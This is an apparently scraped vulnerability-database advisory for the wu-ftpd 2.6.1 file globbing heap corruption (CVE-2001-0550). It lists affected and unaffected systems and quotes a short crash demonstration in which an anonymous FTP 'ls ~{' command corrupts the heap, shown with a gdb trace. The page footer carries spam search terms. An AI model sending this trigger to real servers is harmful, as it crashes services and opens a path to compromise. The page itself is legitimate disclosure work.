about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Wu-Ftpd File Globbing Heap Corruption Vulnerability


Title Wu-Ftpd File Globbing Heap Corruption Vulnerability
Published 2001-11-27-12:00AM
Updated 2002-02-14-10:56PM
Class Failure to Handle Exceptional Conditions
CVE   CVE-2001-0550
Remote  Yes
Local  No
Credit  Condition first reported by Matt Power. Exploitability later confirmed by Luciano Notarfrancesco and Juan Pablo Martinez Kuhn from Core Security Technologies, Buenos Aires, Argentina.
Vulnerable  Washington University wuftpd 2.6.1
Caldera OpenLinux 2.3
Caldera OpenLinux Server 3.1
Cobalt Qube 1.0
Conectiva Linux 6.0
Conectiva Linux 7.0
Conectiva Linux 8.0
FreeBSD FreeBSD 4.3
FreeBSD FreeBSD 4.3 RELEASE
FreeBSD FreeBSD 4.3 STABLE
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 5.0 alpha
MandrakeSoft Corporate Server 1.0.1
MandrakeSoft Linux Mandrake 6.0
MandrakeSoft Linux Mandrake 6.1
MandrakeSoft Linux Mandrake 7.0
MandrakeSoft Linux Mandrake 7.1
MandrakeSoft Linux Mandrake 7.2
MandrakeSoft Linux Mandrake 8.0
MandrakeSoft Linux Mandrake 8.0 ppc
MandrakeSoft Linux Mandrake 8.1
RedHat Linux 7.0 alpha
RedHat Linux 7.0 i386
RedHat Linux 7.0 sparc
RedHat Linux 7.1 alpha
RedHat Linux 7.1 i386
RedHat Linux 7.1 i586
RedHat Linux 7.1 i686
RedHat Linux 7.1 ia64
RedHat Linux 7.1 noarch
RedHat Linux 7.2 alpha
RedHat Linux 7.2 athlon
RedHat Linux 7.2 i386
RedHat Linux 7.2 i586
RedHat Linux 7.2 i686
RedHat Linux 7.2 ia64
RedHat Linux 7.2 noarch
S.u.S.E. Linux 7.0
S.u.S.E. Linux 7.0 alpha
S.u.S.E. Linux 7.0 ppc
S.u.S.E. Linux 7.0 sparc
S.u.S.E. Linux 7.1
S.u.S.E. Linux 7.1 alpha
S.u.S.E. Linux 7.1 ppc
S.u.S.E. Linux 7.1 sparc
S.u.S.E. Linux 7.1 x86
S.u.S.E. Linux 7.2
S.u.S.E. Linux 7.3
SCO eDesktop 2.4
SCO eServer 2.3.1
SCO Open Server 5.0
SCO Open Server 5.0.1
SCO Open Server 5.0.2
SCO Open Server 5.0.3
SCO Open Server 5.0.4
SCO Open Server 5.0.5
SCO Open Server 5.0.6
SCO Open Server 5.0.6 a
Slackware Linux 7.0
Slackware Linux 7.1
Slackware Linux 8.0
Turbolinux Turbolinux 6.0
Turbolinux Turbolinux 6.0.1
Turbolinux Turbolinux 6.0.2
Turbolinux Turbolinux 6.0.3
Turbolinux Turbolinux 6.0.4
Turbolinux Turbolinux 6.0.5
Turbolinux Turbolinux Workstation 6.1
Wirex Immunix OS 7
Wirex Immunix OS 7.0
Wirex Immunix OS 7.0 Beta
Washington University wuftpd 2.6 .0
Cobalt Qube 1.0
Conectiva Linux 4.0
Conectiva Linux 4.0 es
Conectiva Linux 4.1
Conectiva Linux 4.2
Conectiva Linux 5.0
Conectiva Linux 5.1
Debian Linux 2.2
Debian Linux 2.2 68k
Debian Linux 2.2 alpha
Debian Linux 2.2 arm
Debian Linux 2.2 powerpc
Debian Linux 2.2 sparc
FreeBSD FreeBSD 4.3
FreeBSD FreeBSD 4.3 RELEASE
FreeBSD FreeBSD 4.3 STABLE
FreeBSD FreeBSD 4.4
HP HPUX 11.0
HP HPUX 11.11
RedHat Linux 5.2 alpha
RedHat Linux 5.2 i386
RedHat Linux 5.2 sparc
RedHat Linux 6.0
RedHat Linux 6.0 alpha
RedHat Linux 6.0 sparc
RedHat Linux 6.1 alpha
RedHat Linux 6.1 i386
RedHat Linux 6.1 sparc
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
S.u.S.E. Linux 6.1
S.u.S.E. Linux 6.1 alpha
S.u.S.E. Linux 6.2
S.u.S.E. Linux 6.3
S.u.S.E. Linux 6.3 alpha
S.u.S.E. Linux 6.3 ppc
S.u.S.E. Linux 6.4
S.u.S.E. Linux 6.4 alpha
S.u.S.E. Linux 6.4 ppc
S.u.S.E. Linux 7.0 alpha
S.u.S.E. Linux 7.0 i386
S.u.S.E. Linux 7.0 ppc
S.u.S.E. Linux 7.0 sparc
S.u.S.E. Linux 7.1 alpha
S.u.S.E. Linux 7.1 ppc
S.u.S.E. Linux 7.1 sparc
S.u.S.E. Linux 7.1 x86
S.u.S.E. Linux 7.2 i386
S.u.S.E. Linux 7.3 i386
S.u.S.E. Linux 7.3 ppc
S.u.S.E. Linux 7.3 sparc
Turbolinux Turbolinux 4.0
Wirex Immunix OS 6.2
Washington University wuftpd 2.5 .0
Caldera OpenLinux 2.4
Caldera OpenLinux Desktop 2.3
RedHat Linux 6.0
RedHat Linux 6.0 alpha
RedHat Linux 6.0 sparc
SCO eDesktop 2.4
SCO eServer 2.3
SCO eServer 2.3.1
David Madore ftpdBSD 0.3.3
David Madore ftpdBSD 0.3.2
Not Vulnerable  Washington University wu-ftpd 2.6.2
Compaq Tru64 4.0 b
Compaq Tru64 4.0 d
Compaq Tru64 4.0 d PK9 (BL17)
Compaq Tru64 4.0 e
Compaq Tru64 4.0 f
Compaq Tru64 4.0 f PK6 (BL17)
Compaq Tru64 4.0 f PK7 (BL18)
Compaq Tru64 4.0 g
Compaq Tru64 4.0 g PK3 (BL17)
Compaq Tru64 5.0
Compaq Tru64 5.0 PK4 (BL17)
Compaq Tru64 5.0 PK4 (BL18)
Compaq Tru64 5.0 a
Compaq Tru64 5.0 a PK3 (BL17)
Compaq Tru64 5.0 f
Compaq Tru64 5.1
Compaq Tru64 5.1 PK3 (BL17)
Compaq Tru64 5.1 PK4 (BL18)
Compaq Tru64 5.1 PK5 (BL19)
Compaq Tru64 5.1 PK6 (BL20)
Compaq Tru64 5.1 a
Compaq Tru64 5.1 a PK1 (BL1)
Compaq Tru64 5.1 a PK2 (BL2)
Compaq Tru64 5.1 a PK3 (BL3)
Compaq Tru64 5.1 a PK4 (BL21)
Compaq Tru64 5.1 a PK5 (BL23)
Compaq Tru64 5.1 b
Compaq Tru64 5.1 b PK1 (BL1)
Compaq Tru64 5.1 b PK2 (BL22)
Conectiva Linux 9.0
Debian Linux 3.0
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia-32
Debian Linux 3.0 ia-64
Debian Linux 3.0 m68k
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc
MandrakeSoft Linux Mandrake 8.2
MandrakeSoft Linux Mandrake 8.2 ppc
SCO Open Server 5.0.6
SCO Open Server 5.0.6 a
SCO Open Server 5.0.7
Sun Linux 5.0.7
Turbolinux Turbolinux Advanced Server 6.0
Turbolinux Turbolinux Server 6.1
Turbolinux Turbolinux Workstation 6.0
SGI IRIX 6.5
Code   As of February 5, 2002, reports from credible sources indicate the availability and use of a working exploit for this vulnerability. This increases the likelihood of exploitation by a malicious party.

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following (from the CORE advisory) demonstrates the existence of this vulnerability:

ftp> open localhost
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection

1405 ? S 0:00 ftpd: accepting connections on port 21
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd: sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 18:31:06 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ww.sex.com image zahr sexegurl blak girls freesexvid 200 /compo 18to20 joomlsa news for c sexwomen.c Www.topsex a5158.cn Linux+squi PHP Advanc Www. Ayu A mambo Remo phpbb 2.0. nintedo wi Www timels Thirshasex Www.topsex command li wwwxnx.com acpid Massive co School gir www.lipinc 200 /compo hollywood i...body Invision P rs gallery HIT JAMMER www.qiaoyo News Searc free arabi 321.56 bind-9 indiasexvi m...Fid3.t rendezvous WWW.Indian bjrk WWWhotsex. ptrace-kmo n...224234 Invision P windows xp all cartoo dmoz.im